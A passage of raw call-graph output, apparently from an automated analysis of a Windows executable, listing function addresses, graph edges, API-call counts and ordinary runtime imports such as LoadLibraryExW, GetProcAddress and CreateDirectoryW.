7ff6029a2a70 17361->17365 17376 7ff6029a2add 17361->17376 17373 7ff6029a09b4 38 API calls 17362->17373 17363->17366 17369 7ff6029a2a67 17363->17369 17364->17369 17364->17371 17370 7ff6029a31c8 47 API calls 17365->17370 17386 7ff6029a2b60 17365->17386 17372 7ff6029a371c 45 API calls 17366->17372 17367->17357 17367->17371 17382 7ff6029a2a8b 17368->17382 17369->17365 17374 7ff6029a2aa2 17369->17374 17369->17382 17370->17382 17375 7ff6029a11d4 38 API calls 17371->17375 17371->17386 17372->17382 17373->17382 17377 7ff6029a3504 46 API calls 17374->17377 17374->17386 17375->17382 17376->17357 17378 7ff6029a2ae2 17376->17378 17377->17382 17380 7ff6029a35c8 37 API calls 17378->17380 17378->17386 17379 7ff60299b5c0 _log10_special 8 API calls 17381 7ff6029a2e5a 17379->17381 17380->17382 17381->17313 17383 7ff6029a3830 45 API calls 17382->17383 17385 7ff6029a2d4c 17382->17385 17382->17386 17383->17385 17384 7ff6029ad888 46 API calls 17384->17385 17385->17384 17385->17386 17386->17379 17607 7ff6029a0038 17387->17607 17391 7ff6029a31ee 17390->17391 17453 7ff60299fbf0 17391->17453 17395 7ff6029a3333 17397 7ff6029a33c1 17395->17397 17399 7ff6029a3830 45 API calls 17395->17399 17397->17345 17398 7ff6029a3830 45 API calls 17398->17395 17399->17397 17401 7ff6029a3539 17400->17401 17402 7ff6029a3557 17401->17402 17403 7ff6029a357e 17401->17403 17404 7ff6029a3830 45 API calls 17401->17404 17405 7ff6029ad888 46 API calls 17402->17405 17403->17345 17404->17402 17405->17403 17409 7ff6029a35e9 17406->17409 17407 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17408 7ff6029a361a 17407->17408 17408->17345 17409->17407 17409->17408 17411 7ff6029a0df7 17410->17411 17412 7ff6029a0e26 17411->17412 17415 7ff6029a0ee3 17411->17415 17413 7ff6029a0e63 17412->17413 17580 7ff60299fc98 17412->17580 17413->17345 17416 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17415->17416 17416->17413 17418 7ff6029a09e7 17417->17418 17419 7ff6029a0a16 17418->17419 17421 7ff6029a0ad3 17418->17421 17420 7ff60299fc98 12 API calls 17419->17420 17423 7ff6029a0a53 17419->17423 17420->17423 17422 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17421->17422 17422->17423 17423->17345 17425 7ff6029a375f 17424->17425 17427 7ff6029a3763 __crtLCMapStringW 17425->17427 17588 7ff6029a37b8 17425->17588 17427->17345 17430 7ff6029a1207 17428->17430 17429 7ff6029a1236 17431 7ff60299fc98 12 API calls 17429->17431 17434 7ff6029a1273 17429->17434 17430->17429 17432 7ff6029a12f3 17430->17432 17431->17434 17433 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17432->17433 17433->17434 17434->17345 17436 7ff6029a3847 17435->17436 17592 7ff6029ac838 17436->17592 17442 7ff6029ad8b9 17441->17442 17450 7ff6029ad8c7 17441->17450 17443 7ff6029ad8e7 17442->17443 17444 7ff6029a3830 45 API calls 17442->17444 17442->17450 17445 7ff6029ad91f 17443->17445 17446 7ff6029ad8f8 17443->17446 17444->17443 17448 7ff6029ad949 17445->17448 17449 7ff6029ad9aa 17445->17449 17445->17450 17600 7ff6029aef20 17446->17600 17448->17450 17452 7ff6029ae720 _fread_nolock MultiByteToWideChar 17448->17452 17451 7ff6029ae720 _fread_nolock MultiByteToWideChar 17449->17451 17450->17349 17451->17450 17452->17450 17454 7ff60299fc16 17453->17454 17455 7ff60299fc27 17453->17455 17461 7ff6029ad3f0 17454->17461 17455->17454 17456 7ff6029ac47c _fread_nolock 12 API calls 17455->17456 17457 7ff60299fc54 17456->17457 17458 7ff60299fc68 17457->17458 17459 7ff6029a97c8 __free_lconv_mon 11 API calls 17457->17459 17460 7ff6029a97c8 __free_lconv_mon 11 API calls 17458->17460 17459->17458 17460->17454 17462 7ff6029ad40d 17461->17462 17463 7ff6029ad440 17461->17463 17464 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17462->17464 17463->17462 17465 7ff6029ad472 17463->17465 17472 7ff6029a3311 17464->17472 17470 7ff6029ad585 17465->17470 17478 7ff6029ad4ba 17465->17478 17466 7ff6029ad677 17507 7ff6029ac8dc 17466->17507 17468 7ff6029ad63d 17500 7ff6029acc74 17468->17500 17470->17466 17470->17468 17471 7ff6029ad60c 17470->17471 17474 7ff6029ad5cf 17470->17474 17475 7ff6029ad5c5 17470->17475 17493 7ff6029acf54 17471->17493 17472->17395 17472->17398 17483 7ff6029ad184 17474->17483 17475->17468 17477 7ff6029ad5ca 17475->17477 17477->17471 17477->17474 17478->17472 17479 7ff6029a9324 __std_exception_copy 37 API calls 17478->17479 17480 7ff6029ad572 17479->17480 17480->17472 17481 7ff6029a9780 _isindst 17 API calls 17480->17481 17482 7ff6029ad6d4 17481->17482 17516 7ff6029b2e2c 17483->17516 17487 7ff6029ad22c 17488 7ff6029ad281 17487->17488 17490 7ff6029ad24c 17487->17490 17492 7ff6029ad230 17487->17492 17569 7ff6029acd70 17488->17569 17490->17490 17565 7ff6029ad02c 17490->17565 17492->17472 17494 7ff6029b2e2c 38 API calls 17493->17494 17495 7ff6029acf9e 17494->17495 17496 7ff6029b2874 37 API calls 17495->17496 17497 7ff6029acfee 17496->17497 17498 7ff6029acff2 17497->17498 17499 7ff6029ad02c 45 API calls 17497->17499 17498->17472 17499->17498 17501 7ff6029b2e2c 38 API calls 17500->17501 17502 7ff6029accbf 17501->17502 17503 7ff6029b2874 37 API calls 17502->17503 17504 7ff6029acd17 17503->17504 17505 7ff6029acd1b 17504->17505 17506 7ff6029acd70 45 API calls 17504->17506 17505->17472 17506->17505 17508 7ff6029ac921 17507->17508 17509 7ff6029ac954 17507->17509 17510 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17508->17510 17511 7ff6029ac96c 17509->17511 17514 7ff6029ac9ed 17509->17514 17513 7ff6029ac94d memcpy_s 17510->17513 17512 7ff6029acc74 46 API calls 17511->17512 17512->17513 17513->17472 17514->17513 17515 7ff6029a3830 45 API calls 17514->17515 17515->17513 17517 7ff6029b2e7f fegetenv 17516->17517 17518 7ff6029b6e0c 37 API calls 17517->17518 17522 7ff6029b2ed2 17518->17522 17519 7ff6029b2eff 17524 7ff6029a9324 __std_exception_copy 37 API calls 17519->17524 17520 7ff6029b2fc2 17521 7ff6029b6e0c 37 API calls 17520->17521 17523 7ff6029b2fec 17521->17523 17522->17520 17525 7ff6029b2eed 17522->17525 17526 7ff6029b2f9c 17522->17526 17527 7ff6029b6e0c 37 API calls 17523->17527 17528 7ff6029b2f7d 17524->17528 17525->17519 17525->17520 17529 7ff6029a9324 __std_exception_copy 37 API calls 17526->17529 17530 7ff6029b2ffd 17527->17530 17531 7ff6029b40a4 17528->17531 17535 7ff6029b2f85 17528->17535 17529->17528 17533 7ff6029b7000 20 API calls 17530->17533 17532 7ff6029a9780 _isindst 17 API calls 17531->17532 17534 7ff6029b40b9 17532->17534 17545 7ff6029b3066 memcpy_s 17533->17545 17536 7ff60299b5c0 _log10_special 8 API calls 17535->17536 17537 7ff6029ad1d1 17536->17537 17561 7ff6029b2874 17537->17561 17538 7ff6029b340f memcpy_s 17539 7ff6029b374f 17540 7ff6029b2990 37 API calls 17539->17540 17550 7ff6029b3e67 17540->17550 17541 7ff6029b36fb 17541->17539 17546 7ff6029b40bc memcpy_s 37 API calls 17541->17546 17542 7ff6029b3ec2 17552 7ff6029b4048 17542->17552 17558 7ff6029b2990 37 API calls 17542->17558 17560 7ff6029b40bc memcpy_s 37 API calls 17542->17560 17543 7ff6029b30a7 memcpy_s 17544 7ff6029b3503 memcpy_s 17543->17544 17549 7ff6029b39eb memcpy_s 17543->17549 17544->17541 17556 7ff6029a4144 11 API calls _set_fmode 17544->17556 17557 7ff6029a9760 37 API calls _invalid_parameter_noinfo 17544->17557 17545->17538 17545->17543 17547 7ff6029a4144 _set_fmode 11 API calls 17545->17547 17546->17539 17548 7ff6029b34e0 17547->17548 17551 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17548->17551 17549->17539 17549->17541 17555 7ff6029a4144 11 API calls _set_fmode 17549->17555 17559 7ff6029a9760 37 API calls _invalid_parameter_noinfo 17549->17559 17550->17542 17553 7ff6029b40bc memcpy_s 37 API calls 17550->17553 17551->17543 17554 7ff6029b6e0c 37 API calls 17552->17554 17553->17542 17554->17535 17555->17549 17556->17544 17557->17544 17558->17542 17559->17549 17560->17542 17562 7ff6029b2893 17561->17562 17563 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17562->17563 17564 7ff6029b28be memcpy_s 17562->17564 17563->17564 17564->17487 17566 7ff6029ad058 memcpy_s 17565->17566 17567 7ff6029a3830 45 API calls 17566->17567 17568 7ff6029ad112 memcpy_s 17566->17568 17567->17568 17568->17492 17570 7ff6029acdab 17569->17570 17573 7ff6029acdf8 memcpy_s 17569->17573 17571 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17570->17571 17572 7ff6029acdd7 17571->17572 17572->17492 17573->17573 17574 7ff6029ace63 17573->17574 17576 7ff6029a3830 45 API calls 17573->17576 17575 7ff6029a9324 __std_exception_copy 37 API calls 17574->17575 17579 7ff6029acea5 memcpy_s 17575->17579 17576->17574 17577 7ff6029a9780 _isindst 17 API calls 17578 7ff6029acf50 17577->17578 17579->17577 17581 7ff60299fccf 17580->17581 17582 7ff60299fcbe 17580->17582 17581->17582 17583 7ff6029ac47c _fread_nolock 12 API calls 17581->17583 17582->17413 17584 7ff60299fd00 17583->17584 17585 7ff60299fd14 17584->17585 17587 7ff6029a97c8 __free_lconv_mon 11 API calls 17584->17587 17586 7ff6029a97c8 __free_lconv_mon 11 API calls 17585->17586 17586->17582 17587->17585 17589 7ff6029a37de 17588->17589 17590 7ff6029a37d6 17588->17590 17589->17427 17591 7ff6029a3830 45 API calls 17590->17591 17591->17589 17593 7ff6029ac851 17592->17593 17594 7ff6029a386f 17592->17594 17593->17594 17595 7ff6029b2084 45 API calls 17593->17595 17596 7ff6029ac8a4 17594->17596 17595->17594 17597 7ff6029a387f 17596->17597 17598 7ff6029ac8bd 17596->17598 17597->17349 17598->17597 17599 7ff6029b13d0 45 API calls 17598->17599 17599->17597 17603 7ff6029b5df0 17600->17603 17606 7ff6029b5e54 17603->17606 17604 7ff60299b5c0 _log10_special 8 API calls 17605 7ff6029aef3d 17604->17605 17605->17450 17606->17604 17608 7ff6029a007f 17607->17608 17609 7ff6029a006d 17607->17609 17611 7ff6029a008d 17608->17611 17616 7ff6029a00c9 17608->17616 17610 7ff6029a4144 _set_fmode 11 API calls 17609->17610 17612 7ff6029a0072 17610->17612 17613 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17611->17613 17614 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17612->17614 17622 7ff6029a007d 17613->17622 17614->17622 17615 7ff6029a0445 17617 7ff6029a4144 _set_fmode 11 API calls 17615->17617 17615->17622 17616->17615 17618 7ff6029a4144 _set_fmode 11 API calls 17616->17618 17619 7ff6029a06d9 17617->17619 17620 7ff6029a043a 17618->17620 17623 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17619->17623 17621 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17620->17621 17621->17615 17622->17313 17623->17622 17625 7ff60299f774 17624->17625 17654 7ff60299f4d4 17625->17654 17627 7ff60299f78d 17627->16990 17666 7ff60299f42c 17628->17666 17632 7ff60299277c 17631->17632 17633 7ff6029a4144 _set_fmode 11 API calls 17632->17633 17634 7ff602992799 17633->17634 17680 7ff6029a39f4 17634->17680 17639 7ff602991bf0 49 API calls 17640 7ff602992807 17639->17640 17641 7ff602998410 2 API calls 17640->17641 17642 7ff60299281f 17641->17642 17643 7ff602992843 MessageBoxA 17642->17643 17644 7ff60299282c MessageBoxW 17642->17644 17645 7ff602992855 17643->17645 17644->17645 17646 7ff60299b5c0 _log10_special 8 API calls 17645->17646 17647 7ff602992865 17646->17647 17647->17019 17649 7ff60299f189 17648->17649 17651 7ff602991b06 17648->17651 17650 7ff6029a4144 _set_fmode 11 API calls 17649->17650 17652 7ff60299f18e 17650->17652 17651->17018 17651->17019 17653 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17652->17653 17653->17651 17655 7ff60299f53e 17654->17655 17656 7ff60299f4fe 17654->17656 17655->17656 17658 7ff60299f54a 17655->17658 17657 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17656->17657 17659 7ff60299f525 17657->17659 17665 7ff6029a44cc EnterCriticalSection 17658->17665 17659->17627 17667 7ff60299f456 17666->17667 17678 7ff6029919b9 17666->17678 17668 7ff60299f4a2 17667->17668 17669 7ff60299f465 memcpy_s 17667->17669 17667->17678 17679 7ff6029a44cc EnterCriticalSection 17668->17679 17671 7ff6029a4144 _set_fmode 11 API calls 17669->17671 17673 7ff60299f47a 17671->17673 17676 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17673->17676 17676->17678 17678->16996 17678->16997 17682 7ff6029a3a4e 17680->17682 17681 7ff6029a3a73 17684 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17681->17684 17682->17681 17683 7ff6029a3aaf 17682->17683 17710 7ff6029a1c80 17683->17710 17686 7ff6029a3a9d 17684->17686 17689 7ff60299b5c0 _log10_special 8 API calls 17686->17689 17687 7ff6029a3b8c 17688 7ff6029a97c8 __free_lconv_mon 11 API calls 17687->17688 17688->17686 17691 7ff6029927d8 17689->17691 17698 7ff6029a41d0 17691->17698 17692 7ff6029a3b61 17696 7ff6029a97c8 __free_lconv_mon 11 API calls 17692->17696 17693 7ff6029a3bb0 17693->17687 17695 7ff6029a3bba 17693->17695 17694 7ff6029a3b58 17694->17687 17694->17692 17697 7ff6029a97c8 __free_lconv_mon 11 API calls 17695->17697 17696->17686 17697->17686 17699 7ff6029aa148 _set_fmode 11 API calls 17698->17699 17700 7ff6029a41e7 17699->17700 17701 7ff6029a4227 17700->17701 17702 7ff6029ada18 _set_fmode 11 API calls 17700->17702 17707 7ff6029927df 17700->17707 17701->17707 17845 7ff6029adaa0 17701->17845 17703 7ff6029a421c 17702->17703 17704 7ff6029a97c8 __free_lconv_mon 11 API calls 17703->17704 17704->17701 17707->17639 17708 7ff6029a9780 _isindst 17 API calls 17709 7ff6029a426c 17708->17709 17711 7ff6029a1cbe 17710->17711 17712 7ff6029a1cae 17710->17712 17713 7ff6029a1cc7 17711->17713 17717 7ff6029a1cf5 17711->17717 17714 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17712->17714 17715 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17713->17715 17716 7ff6029a1ced 17714->17716 17715->17716 17716->17687 17716->17692 17716->17693 17716->17694 17717->17712 17717->17716 17718 7ff6029a3830 45 API calls 17717->17718 17720 7ff6029a1fa4 17717->17720 17724 7ff6029a2610 17717->17724 17750 7ff6029a22d8 17717->17750 17780 7ff6029a1b60 17717->17780 17718->17717 17722 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17720->17722 17722->17712 17725 7ff6029a2652 17724->17725 17726 7ff6029a26c5 17724->17726 17727 7ff6029a26ef 17725->17727 17728 7ff6029a2658 17725->17728 17729 7ff6029a271f 17726->17729 17730 7ff6029a26ca 17726->17730 17797 7ff6029a0bc0 17727->17797 17735 7ff6029a265d 17728->17735 17739 7ff6029a272e 17728->17739 17729->17727 17729->17739 17748 7ff6029a2688 17729->17748 17731 7ff6029a26ff 17730->17731 17732 7ff6029a26cc 17730->17732 17804 7ff6029a07b0 17731->17804 17734 7ff6029a266d 17732->17734 17738 7ff6029a26db 17732->17738 17749 7ff6029a275d 17734->17749 17783 7ff6029a2f74 17734->17783 17735->17734 17740 7ff6029a26a0 17735->17740 17735->17748 17738->17727 17742 7ff6029a26e0 17738->17742 17739->17749 17811 7ff6029a0fd0 17739->17811 17740->17749 17793 7ff6029a3430 17740->17793 17745 7ff6029a35c8 37 API calls 17742->17745 17742->17749 17744 7ff60299b5c0 _log10_special 8 API calls 17746 7ff6029a29f3 17744->17746 17745->17748 17746->17717 17748->17749 17818 7ff6029ad6d8 17748->17818 17749->17744 17751 7ff6029a22e3 17750->17751 17752 7ff6029a22f9 17750->17752 17753 7ff6029a2652 17751->17753 17754 7ff6029a26c5 17751->17754 17756 7ff6029a2337 17751->17756 17755 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17752->17755 17752->17756 17757 7ff6029a26ef 17753->17757 17758 7ff6029a2658 17753->17758 17759 7ff6029a271f 17754->17759 17760 7ff6029a26ca 17754->17760 17755->17756 17756->17717 17763 7ff6029a0bc0 38 API calls 17757->17763 17767 7ff6029a265d 17758->17767 17770 7ff6029a272e 17758->17770 17759->17757 17759->17770 17778 7ff6029a2688 17759->17778 17761 7ff6029a26ff 17760->17761 17762 7ff6029a26cc 17760->17762 17765 7ff6029a07b0 38 API calls 17761->17765 17764 7ff6029a266d 17762->17764 17768 7ff6029a26db 17762->17768 17763->17778 17766 7ff6029a2f74 47 API calls 17764->17766 17779 7ff6029a275d 17764->17779 17765->17778 17766->17778 17767->17764 17769 7ff6029a26a0 17767->17769 17767->17778 17768->17757 17772 7ff6029a26e0 17768->17772 17773 7ff6029a3430 47 API calls 17769->17773 17769->17779 17771 7ff6029a0fd0 38 API calls 17770->17771 17770->17779 17771->17778 17775 7ff6029a35c8 37 API calls 17772->17775 17772->17779 17773->17778 17774 7ff60299b5c0 _log10_special 8 API calls 17776 7ff6029a29f3 17774->17776 17775->17778 17776->17717 17777 7ff6029ad6d8 47 API calls 17777->17778 17778->17777 17778->17779 17779->17774 17828 7ff60299fd84 17780->17828 17784 7ff6029a2f96 17783->17784 17785 7ff60299fbf0 12 API calls 17784->17785 17786 7ff6029a2fde 17785->17786 17787 7ff6029ad3f0 46 API calls 17786->17787 17788 7ff6029a30b1 17787->17788 17789 7ff6029a30d3 17788->17789 17790 7ff6029a3830 45 API calls 17788->17790 17791 7ff6029a3830 45 API calls 17789->17791 17792 7ff6029a315c 17789->17792 17790->17789 17791->17792 17792->17748 17794 7ff6029a3448 17793->17794 17796 7ff6029a34b0 17793->17796 17795 7ff6029ad6d8 47 API calls 17794->17795 17794->17796 17795->17796 17796->17748 17799 7ff6029a0bf3 17797->17799 17798 7ff6029a0c22 17800 7ff60299fbf0 12 API calls 17798->17800 17803 7ff6029a0c5f 17798->17803 17799->17798 17801 7ff6029a0cdf 17799->17801 17800->17803 17802 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17801->17802 17802->17803 17803->17748 17805 7ff6029a07e3 17804->17805 17806 7ff6029a0812 17805->17806 17808 7ff6029a08cf 17805->17808 17807 7ff60299fbf0 12 API calls 17806->17807 17810 7ff6029a084f 17806->17810 17807->17810 17809 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17808->17809 17809->17810 17810->17748 17812 7ff6029a1003 17811->17812 17813 7ff6029a1032 17812->17813 17815 7ff6029a10ef 17812->17815 17814 7ff60299fbf0 12 API calls 17813->17814 17817 7ff6029a106f 17813->17817 17814->17817 17816 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17815->17816 17816->17817 17817->17748 17819 7ff6029ad700 17818->17819 17820 7ff6029ad745 17819->17820 17821 7ff6029a3830 45 API calls 17819->17821 17822 7ff6029ad705 memcpy_s 17819->17822 17824 7ff6029ad72e memcpy_s 17819->17824 17820->17822 17820->17824 17825 7ff6029af574 WideCharToMultiByte 17820->17825 17821->17820 17822->17748 17823 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17823->17822 17824->17822 17824->17823 17826 7ff6029ad821 17825->17826 17826->17822 17827 7ff6029ad836 GetLastError 17826->17827 17827->17822 17827->17824 17829 7ff60299fdb1 17828->17829 17830 7ff60299fdc3 17828->17830 17831 7ff6029a4144 _set_fmode 11 API calls 17829->17831 17833 7ff60299fdd0 17830->17833 17837 7ff60299fe0d 17830->17837 17832 7ff60299fdb6 17831->17832 17835 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17832->17835 17834 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 17833->17834 17842 7ff60299fdc1 17834->17842 17835->17842 17836 7ff60299feb6 17839 7ff6029a4144 _set_fmode 11 API calls 17836->17839 17836->17842 17837->17836 17838 7ff6029a4144 _set_fmode 11 API calls 17837->17838 17840 7ff60299feab 17838->17840 17841 7ff60299ff60 17839->17841 17843 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17840->17843 17844 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17841->17844 17842->17717 17843->17836 17844->17842 17849 7ff6029adabd 17845->17849 17846 7ff6029adac2 17847 7ff6029a424d 17846->17847 17848 7ff6029a4144 _set_fmode 11 API calls 17846->17848 17847->17707 17847->17708 17850 7ff6029adacc 17848->17850 17849->17846 17849->17847 17852 7ff6029adb0c 17849->17852 17851 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17850->17851 17851->17847 17852->17847 17853 7ff6029a4144 _set_fmode 11 API calls 17852->17853 17853->17850 17855 7ff6029a70d0 17854->17855 17856 7ff6029a70bd 17854->17856 17864 7ff6029a6d34 17855->17864 17857 7ff6029a4144 _set_fmode 11 API calls 17856->17857 17859 7ff6029a70c2 17857->17859 17861 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 17859->17861 17862 7ff6029a70ce 17861->17862 17862->17037 17871 7ff6029af158 EnterCriticalSection 17864->17871 17873 7ff602997ae1 GetTokenInformation 17872->17873 17874 7ff602997b63 __vcrt_freefls 17872->17874 17875 7ff602997b02 GetLastError 17873->17875 17878 7ff602997b0d 17873->17878 17876 7ff602997b76 CloseHandle 17874->17876 17877 7ff602997b7c 17874->17877 17875->17874 17875->17878 17876->17877 17877->17046 17878->17874 17879 7ff602997b29 GetTokenInformation 17878->17879 17879->17874 17880 7ff602997b4c 17879->17880 17880->17874 17881 7ff602997b56 ConvertSidToStringSidW 17880->17881 17881->17874 17883 7ff60299297a 17882->17883 18058 7ff602993f50 108 API calls 18057->18058 18059 7ff602991463 18058->18059 18060 7ff60299146b 18059->18060 18061 7ff60299148c 18059->18061 18062 7ff6029925f0 53 API calls 18060->18062 18063 7ff60299f744 73 API calls 18061->18063 18064 7ff60299147b 18062->18064 18065 7ff6029914a1 18063->18065 18064->17105 18066 7ff6029914c1 18065->18066 18067 7ff6029914a5 18065->18067 18069 7ff6029914f1 18066->18069 18070 7ff6029914d1 18066->18070 18068 7ff602992760 53 API calls 18067->18068 18076 7ff6029914bc __vcrt_freefls 18068->18076 18073 7ff6029914f7 18069->18073 18078 7ff60299150a 18069->18078 18071 7ff602992760 53 API calls 18070->18071 18071->18076 18072 7ff60299f0bc 74 API calls 18074 7ff602991584 18072->18074 18081 7ff6029911f0 18073->18081 18074->17105 18076->18072 18077 7ff60299f40c _fread_nolock 53 API calls 18077->18078 18078->18076 18078->18077 18079 7ff602991596 18078->18079 18080 7ff602992760 53 API calls 18079->18080 18080->18076 18082 7ff602991248 18081->18082 18083 7ff60299124f 18082->18083 18084 7ff602991277 18082->18084 18085 7ff6029925f0 53 API calls 18083->18085 18087 7ff602991291 18084->18087 18088 7ff6029912ad 18084->18088 18086 7ff602991262 18085->18086 18086->18076 18089 7ff602992760 53 API calls 18087->18089 18090 7ff6029912bf 18088->18090 18098 7ff6029912db memcpy_s 18088->18098 18119 7ff602993efa 18118->18119 18120 7ff602998410 2 API calls 18119->18120 18121 7ff602993f1f 18120->18121 18122 7ff60299b5c0 _log10_special 8 API calls 18121->18122 18123 7ff602993f47 18122->18123 18123->17130 18125 7ff60299748e 18124->18125 18126 7ff602991bf0 49 API calls 18125->18126 18127 7ff6029975b2 18125->18127 18132 7ff602997515 18126->18132 18128 7ff60299b5c0 _log10_special 8 API calls 18127->18128 18129 7ff6029975e3 18128->18129 18129->17130 18130 7ff602991bf0 49 API calls 18130->18132 18131 7ff602993ef0 10 API calls 18131->18132 18132->18127 18132->18130 18132->18131 18133 7ff602998410 2 API calls 18132->18133 18134 7ff602997583 CreateDirectoryW 18133->18134 18134->18127 18134->18132 18136 7ff6029915d3 18135->18136 18137 7ff6029915f7 18135->18137 18224 7ff602991050 18136->18224 18139 7ff602993f50 108 API calls 18137->18139 18141 7ff60299160b 18139->18141 18140 7ff6029915d8 18142 7ff6029915ee 18140->18142 18145 7ff6029925f0 53 API calls 18140->18145 18143 7ff602991613 18141->18143 18144 7ff60299163b 18141->18144 18142->17130 18146 7ff602992760 53 API calls 18143->18146 18147 7ff602993f50 108 API calls 18144->18147 18145->18142 18149 7ff60299162a 18146->18149 18148 7ff60299164f 18147->18148 18150 7ff602991671 18148->18150 18151 7ff602991657 18148->18151 18149->17130 18153 7ff60299f744 73 API calls 18150->18153 18152 7ff6029925f0 53 API calls 18151->18152 18174 7ff6029968a4 18173->18174 18175 7ff6029968eb 18173->18175 18174->18175 18263 7ff6029a3fa0 18174->18263 18175->17130 18178 7ff602993b31 18177->18178 18179 7ff602993e70 49 API calls 18178->18179 18180 7ff602993b6b 18179->18180 18181 7ff602993e70 49 API calls 18180->18181 18182 7ff602993b7b 18181->18182 18183 7ff602993bcc 18182->18183 18184 7ff602993b9d 18182->18184 18186 7ff602993aa0 51 API calls 18183->18186 18278 7ff602993aa0 18184->18278 18187 7ff602993bca 18186->18187 18188 7ff602993bf7 18187->18188 18189 7ff602993c2c 18187->18189 18222 7ff602991bf0 49 API calls 18221->18222 18223 7ff602993e04 18222->18223 18223->17130 18225 7ff602993f50 108 API calls 18224->18225 18226 7ff60299108b 18225->18226 18227 7ff602991093 18226->18227 18228 7ff6029910a8 18226->18228 18229 7ff6029925f0 53 API calls 18227->18229 18230 7ff60299f744 73 API calls 18228->18230 18232 7ff6029910a3 __vcrt_freefls 18229->18232 18231 7ff6029910bd 18230->18231 18233 7ff6029910c1 18231->18233 18234 7ff6029910dd 18231->18234 18232->18140 18264 7ff6029a3fda 18263->18264 18265 7ff6029a3fad 18263->18265 18266 7ff6029a3ffd 18264->18266 18269 7ff6029a4019 18264->18269 18267 7ff6029a4144 _set_fmode 11 API calls 18265->18267 18274 7ff6029a3f64 18265->18274 18268 7ff6029a4144 _set_fmode 11 API calls 18266->18268 18270 7ff6029a3fb7 18267->18270 18271 7ff6029a4002 18268->18271 18272 7ff6029a3ec8 45 API calls 18269->18272 18273 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 18270->18273 18275 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 18271->18275 18277 7ff6029a400d 18272->18277 18276 7ff6029a3fc2 18273->18276 18274->18174 18275->18277 18276->18174 18277->18174 18279 7ff602993ac6 18278->18279 18342 7ff6029a4f28 18341->18342 18343 7ff6029a4f4e 18342->18343 18346 7ff6029a4f81 18342->18346 18344 7ff6029a4144 _set_fmode 11 API calls 18343->18344 18345 7ff6029a4f53 18344->18345 18349 7ff6029a9760 _invalid_parameter_noinfo 37 API calls 18345->18349 18347 7ff6029a4f94 18346->18347 18348 7ff6029a4f87 18346->18348 18360 7ff6029a9aa8 18347->18360 18350 7ff6029a4144 _set_fmode 11 API calls 18348->18350 18359 7ff602993fa6 18349->18359 18350->18359 18359->17157 18373 7ff6029af158 EnterCriticalSection 18360->18373 18733 7ff6029a6958 18732->18733 18736 7ff6029a6434 18733->18736 18735 7ff6029a6971 18735->17167 18737 7ff6029a644f 18736->18737 18738 7ff6029a647e 18736->18738 18739 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 18737->18739 18746 7ff6029a44cc EnterCriticalSection 18738->18746 18741 7ff6029a646f 18739->18741 18741->18735 18748 7ff60299eee1 18747->18748 18749 7ff60299eeb3 18747->18749 18752 7ff60299eed3 18748->18752 18757 7ff6029a44cc EnterCriticalSection 18748->18757 18750 7ff6029a9694 _invalid_parameter_noinfo 37 API calls 18749->18750 18750->18752 18752->17171 18759 7ff602998410 2 API calls 18758->18759 18760 7ff602998104 LoadLibraryExW 18759->18760 18761 7ff602998123 __vcrt_freefls 18760->18761 18761->17201 18763 7ff602996e93 GetProcAddress 18762->18763 18764 7ff602996e69 18762->18764 18763->18764 18765 7ff602996eb8 GetProcAddress 18763->18765 18766 7ff6029929e0 51 API calls 18764->18766 18765->18764 18767 7ff602996edd GetProcAddress 18765->18767 18769 7ff602996e83 18766->18769 18767->18764 18769->17208 18824 7ff602995ae5 18823->18824 18825 7ff602991bf0 49 API calls 18824->18825 18826 7ff602995b21 18825->18826 18827 7ff602995b2a 18826->18827 18828 7ff602995b4d 18826->18828 18829 7ff6029925f0 53 API calls 18827->18829 18830 7ff602993fc0 49 API calls 18828->18830 18846 7ff602995b43 18829->18846 18831 7ff602995b65 18830->18831 18832 7ff602995b83 18831->18832 18835 7ff6029925f0 53 API calls 18831->18835 18833 7ff602993ef0 10 API calls 18832->18833 18836 7ff602995b8d 18833->18836 18834 7ff60299b5c0 _log10_special 8 API calls 18837 7ff60299308e 18834->18837 18835->18832 18838 7ff602995b9b 18836->18838 18839 7ff6029980f0 3 API calls 18836->18839 18837->17240 18854 7ff602995c60 18837->18854 18840 7ff602993fc0 49 API calls 18838->18840 18839->18838 18841 7ff602995bb4 18840->18841 18842 7ff602995bd9 18841->18842 18843 7ff602995bb9 18841->18843 18845 7ff6029980f0 3 API calls 18842->18845 18844 7ff6029925f0 53 API calls 18843->18844 18844->18846 18847 7ff602995be6 18845->18847 18846->18834 18848 7ff602995bf2 18847->18848 18849 7ff602995c29 18847->18849 18993 7ff602994c60 18854->18993 18856 7ff602995c9a 18857 7ff602995ca2 18856->18857 18858 7ff602995cb3 18856->18858 18859 7ff6029925f0 53 API calls 18857->18859 19000 7ff602994430 18858->19000 18995 7ff602994c8c 18993->18995 18994 7ff602994c94 18994->18856 18995->18994 18997 7ff602994e34 18995->18997 19031 7ff6029a5b04 18995->19031 18996 